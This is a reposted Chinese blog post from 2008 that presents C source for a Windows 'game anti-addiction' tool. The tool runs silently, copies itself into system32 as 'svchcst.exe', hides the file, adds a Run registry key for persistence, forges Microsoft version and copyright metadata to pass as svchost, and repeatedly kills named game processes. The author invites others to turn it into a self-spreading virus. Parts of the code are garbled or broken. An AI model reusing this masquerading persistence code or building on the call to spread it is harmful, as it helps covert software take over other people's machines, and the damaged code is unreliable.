游戏防沉迷软件[适用于所有单机/ 络游戏][C源码][自写][win32平台]

软件工具

前去评论:http://topic.csdn.net/u/20080315/14/e6ca9321-09c0-40c7-9661-9ed1a25be17f.html

朋友总用我的电脑打游戏,我就写了个这东西,嘿嘿
希望有高手能把这东西做成病毒,让它自动传播,已减少游戏危害。

注意:软件行为类似病毒,运行无界面,无任何提示,需手动删除。

说明:
游戏防沉迷软件

完成时间:2008年3月15日

运行平台:win32
编译环境:devc++  windowsxp-sp2
连接库:libpsapi.lib

功能描述:开机启动,监测进程,查杀进程以防止指定程序启动。
执行后系统改动:
  1:创建文件C:/WINDOWS/system32/svchcst.exe(系统+隐藏属性)
  3:添加注册表项Software/Microsoft/Windows/CurrentVersion/Run
       主键:SuQiEr
       键值:C:/WINDOWS/system32/svchcst.exe

程序流程详细描述:
  启动程序
  if(文件所在位置不为C:/WINDOWS/system32/svchcst.exe)
  {
    复制文件到C:/WINDOWS/system32/svchcst.exe
    修改文件C:/WINDOWS/system32/svchcst.exe属性为隐藏+系统
    写入注册表,以实现开机自动启动svchcst.exe
  }
  STRKILL:扫描进程,查找指定进程名并返回该进程pid
  结束指定进程,程序停止1800秒,跳转至STRKILL

—————makefile:
# Project: svchcst
# Makefile created by Dev-C++ 4.9.9.2

CPP  = g++.exe
CC   = gcc.exe
WINDRES = windres.exe
RES  = kill_private.res
OBJ  = main.o $(RES)
LINKOBJ  = main.o $(RES)
LIBS =  -L”d:/Dev-Cpp/lib” -mwindows D:/Dev-Cpp/lib/libpsapi.a  -fmessage-length=0 
INCS =  -I”d:/Dev-Cpp/include” 
CXXINCS =  -I”d:/Dev-Cpp/lib/gcc/mingw32/3.4.2/include”  -I”d:/Dev-Cpp/include/c++/3.4.2/backward”  -I”d:/Dev-Cpp/include/c++/3.4.2/mingw32″  -I”d:/Dev-Cpp/include/c++/3.4.2″  -I”d:/Dev-Cpp/include” 
BIN  = kill.exe
CXXFLAGS = $(CXXINCS)   -ansi -fmessage-length=0
CFLAGS = $(INCS)   -ansi -fmessage-length=0
RM = rm -f

.PHONY: all all-before all-after clean clean-custom

all: all-before kill.exe all-after

clean: clean-custom
${RM} $(OBJ) $(BIN)

$(BIN): $(OBJ)
$(CC) $(LINKOBJ) -o “kill.exe” $(LIBS)

main.o: main.c
$(CC) -c main.c -o main.o $(CFLAGS)

kill_private.res: kill_private.rc 
$(WINDRES) -i kill_private.rc –input-format=rc -o kill_private.res -O coff 

———-KILL_PRIVATE_H(版本与版权信息)
/* THIS FILE WILL BE OVERWRITTEN BY DEV-C++ */
/* DO NOT EDIT ! */

#ifndef KILL_PRIVATE_H
#define KILL_PRIVATE_H

/* VERSION DEFINITIONS */
#define VER_STRING “5.1.2600.2180”
#define VER_MAJOR 5
#define VER_MINOR 1
#define VER_RELEASE 2600
#define VER_BUILD 2180
#define COMPANY_NAME “Microsoft Corporation”
#define FILE_VERSION “5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)”
#define FILE_DESCRIPTION “Generic Host Process for Win32 Services”
#define INTERNAL_NAME “”
#define LEGAL_COPYRIGHT “Microsoft Corporation. All rights reserved.”
#define LEGAL_TRADEMARKS “”
#define ORIGINAL_FILENAME “svchcst.exe”
#define PRODUCT_NAME “Microsoft  Windows Operating System”
#define PRODUCT_VERSION “”

#endif /*KILL_PRIVATE_H*/

———-main.c主功能代码
#include 
#include 
#include 
#include 

#define GAMENAME “cs.exe”,”Wow.exe”,”war3.exe” /*游戏名列表,用逗 隔开*/
#define PLAYTIME 1800  /*定时为1800秒*/ 

#define KILLDIR “C://WINDOWS//system32//svchcst.exe”

/*自动启动*/
BOOL RegisterToAutoRun(void)
{   
/*Define   Varible*/
HKEY hKEY;
long ret;

LPSTR FileCurrentExeName = KILLDIR;
DWORD type=REG_SZ;
DWORD size=MAX_PATH;
LPCTSTR lpValueName=”SuQiEr”,Rgspath=”Software//Microsoft//Windows//CurrentVersion//Run”;

/*Open key*/
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,Rgspath,0,KEY_WRITE,&hKEY);
if(ret!=ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return 1;
}
/*Set Key*/
ret=RegSetValueEx(hKEY,lpValueName,(DWORD)NULL,type,(CONST BYTE *)FileCurrentExeName,size);
if(ret!=ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return 2;
}
RegCloseKey(hKEY);

return 0;
}

/*接受进程名字符串数组,并且将符合条件进程PID保存到列表;返回符合条件进程个数*/
int getSpecifiedProcessId(DWORD pID[],const char* pszProcessName[])
{
DWORD processId[1024], cbNeeded, dwProcessesCount;
HANDLE hProcess;
HMODULE hMod;
UINT i,j,pidcx=0;
    
char szProcessName[MAX_PATH] = “UnknownProcess”;
DWORD dwArrayInBytes = sizeof(processId)*sizeof(DWORD);

if(!EnumProcesses(processId,dwArrayInBytes,&cbNeeded))
return   0;     
/*计算数组中的元素个数 */  
dwProcessesCount=cbNeeded/sizeof(DWORD);     
/*enableDebugPriv();*//*用于提升进程权限*/
for(i=0;i {
hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,processId[i]);     
if(!hProcess)
{
continue;     
}
else
{
if(EnumProcessModules(hProcess,&hMod,sizeof(hMod),&cbNeeded))
{     
GetModuleBaseName(hProcess,hMod,szProcessName,sizeof(szProcessName));
for(j=0;*pszProcessName[j];j++)
{
if(!_stricmp(szProcessName,pszProcessName[j]))
{
CloseHandle(hProcess);
pID[pidcx++] = processId[i];
break;
}
}
}
}
}
CloseHandle(hProcess);
pID[pidcx++] = 0;
return pidcx;
}

/*自动复制,成功返回0*/
int myCopyFile(void)
{
SHFILEOPSTRUCT Op = {0};
int rettf=0;
char CurrentPath[MAX_PATH+1]= {0};
DWORD size=MAX_PATH;

GetModuleFileName(NULL,CurrentPath,size);

Op.hwnd = NULL;
Op.wFunc = FO_COPY;
Op.pFrom = CurrentPath;
Op.pTo = KILLDIR;
Op.fFlags = FOF_NOCONFIRMATION |FOF_SILENT;

rettf = SHFileOperation(&Op);
return rettf;
}

int WINAPI WinMain (HINSTANCE hThisInstance,
                    HINSTANCE hPrevInstance,
                    LPSTR lpszArgument,
                    int nFunsterStil)
{
DWORD pidcx=0;
DWORD pID[MAX_PATH]={0};
const char* pszProcessName[]= {GAMENAME,”/0″};/*进程名称列表*/
HANDLE handle1;
char CurrentPath[MAX_PATH]= {0};
DWORD size=MAX_PATH;
int i;

GetModuleFileName(NULL,CurrentPath,size);
if(_stricmp(KILLDIR,CurrentPath))
{
myCopyFile();/*拷贝文件*/ 
SetFileAttributes(KILLDIR,FILE_ATTRIBUTE_SYSTEM |FILE_ATTRIBUTE_ARCHIVE |FILE_ATTRIBUTE_HIDDEN);
RegisterToAutoRun();/*自动运行*/
}

while(1)/*结束进程*/
{
pidcx = getSpecifiedProcessId(pID,pszProcessName);
for(i=0;pID[i];i++)
{
handle1=OpenProcess(PROCESS_TERMINATE,FALSE,pID[i]);
if(handle1)
TerminateProcess(handle1,0);
}
sleep(PLAYTIME*1000);
}
    return 0;

 

文章知识点与官方知识档案匹配,可进一步学习相关知识C技能树首页概览115766 人正在系统学习中

声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!

上一篇 2016年2月12日
下一篇 2016年2月12日

相关推荐

首页
软件超市
企服市场
会员中心